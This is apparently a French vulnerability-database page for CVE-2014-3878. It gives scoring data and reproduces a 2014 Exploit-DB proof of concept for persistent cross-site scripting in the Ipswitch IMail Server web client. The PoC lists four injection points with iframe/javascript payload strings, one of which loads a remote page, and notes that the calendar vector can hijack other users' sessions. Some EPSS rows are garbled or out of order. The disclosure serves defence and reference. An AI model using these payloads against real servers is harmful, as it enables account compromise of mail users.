CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Multiple cross-site scripting (XSS) vulnerabilities in the web client interface in Ipswitch IMail Server 12.3 and 12.4, possibly before 12.4.1.15, allow remote attackers to inject arbitrary web script or HTML via (1) the Name field in an add new contact action in the Contacts section or unspecified vectors in (2) an Add Group task in the Contacts section, (3) an add new event action in the Calendar section, or (4) the Task section.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
4.3
AV:N/AC:M/Au:N/C:N/I:P/A:N
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.95%
–
–
2022-02-13
–
–
1.95%
–
–
2022-04-03
–
–
1.95%
–
–
2022-05-29
–
–
1.95%
–
–
2022-10-23
–
–
1.95%
–
–
2023-01-01
–
–
1.95%
–
–
2023-01-15
–
–
1.95%
–
–
2023-03-12
–
–
–
0.19%
–
2023-07-16
–
–
–
0.19%
–
2023-11-19
–
–
–
0.19%
–
2023-12-03
–
–
–
0.19%
–
2023-12-17
–
–
–
0.19%
–
2024-02-11
–
–
–
0.19%
–
2024-02-18
–
–
–
0.19%
–
2024-03-17
–
–
–
0.19%
–
2024-03-24
–
–
–
0.19%
–
2024-06-02
–
–
–
0.19%
–
2024-06-16
–
–
–
0.19%
–
2024-11-24
–
–
–
0.19%
–
2024-12-22
–
–
–
0.39%
–
2025-02-23
–
–
–
0.78%
–
2025-03-02
–
–
–
0.78%
–
2025-01-19
–
–
–
0.39%
–
2025-02-23
–
–
–
0.78%
–
2025-03-09
–
–
–
0.78%
–
2025-03-18
–
–
–
–
0.04%
2025-03-30
–
–
–
–
0.28%
2025-03-30
–
–
–
–
0.28,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2014-06-02 22h00 +00:00 Auteur : Peru EDB Vérifié : No
# Exploit Title: IPSwitch IMail Server WEB client 12.4 persistent XSS
# Google Dork:
# Date: 3 june 2014
# Exploit Author: Peru (GoSecure!)
# Vendor Homepage: www.ipswitch.com
# Software Link: http://www.imailserver.com/try/
# Version: Tested on 12.3 and 12.4 before 12.4.1.15
# Tested on: WindowsServer2008R2 STD SP1
# CVE : 2014-3878
Four injection points were useful to create a persistent Cross Site Scripting. All the injections are reached using default Web Client interface, but the Web Client Lite seems to be not vulnerable to these tests.
1. Contacts section:
A persistent XSS can be reached adding a new contact with a specific string in the Name field and whatever image:
PoC string:
Go<IFRAME SRC="javascript:alert('www.gosecure.it');"></IFRAME>Secure!
When the contact is saved and on mouse over the picture the Name is been displayed in a bubble activating the JS:
2. Contacts section:
A vulnerability can also be reached in the Adding Group task.
PoC string:
<iframe src="http://www.gosecure.it" height=500 width=500 frameborder=1 align=center></iframe>
3. Calendar section:
A persistent XSS can be reached adding a new event in the Calendar; this event can be spread adding the Meeting Request option.
Since, using this injection point, the XSS can be spread to other users, this is the most dangerous of the four and can be used to spoofing sessions and therefore compromising the attacked users account
The JavaScript is executed simply viewing the calendar or when the Reminder pops up.
PoC string:
GS!<IFRAME SRC="javascript:alert(‘GoSecure!');"></IFRAME>
4.Task section:
In a similar way also the tasks are vulnerable to persistent XXS.
PoC string:
<iframe src=http://www.gosecure.it/blog/remote/xss_h.html>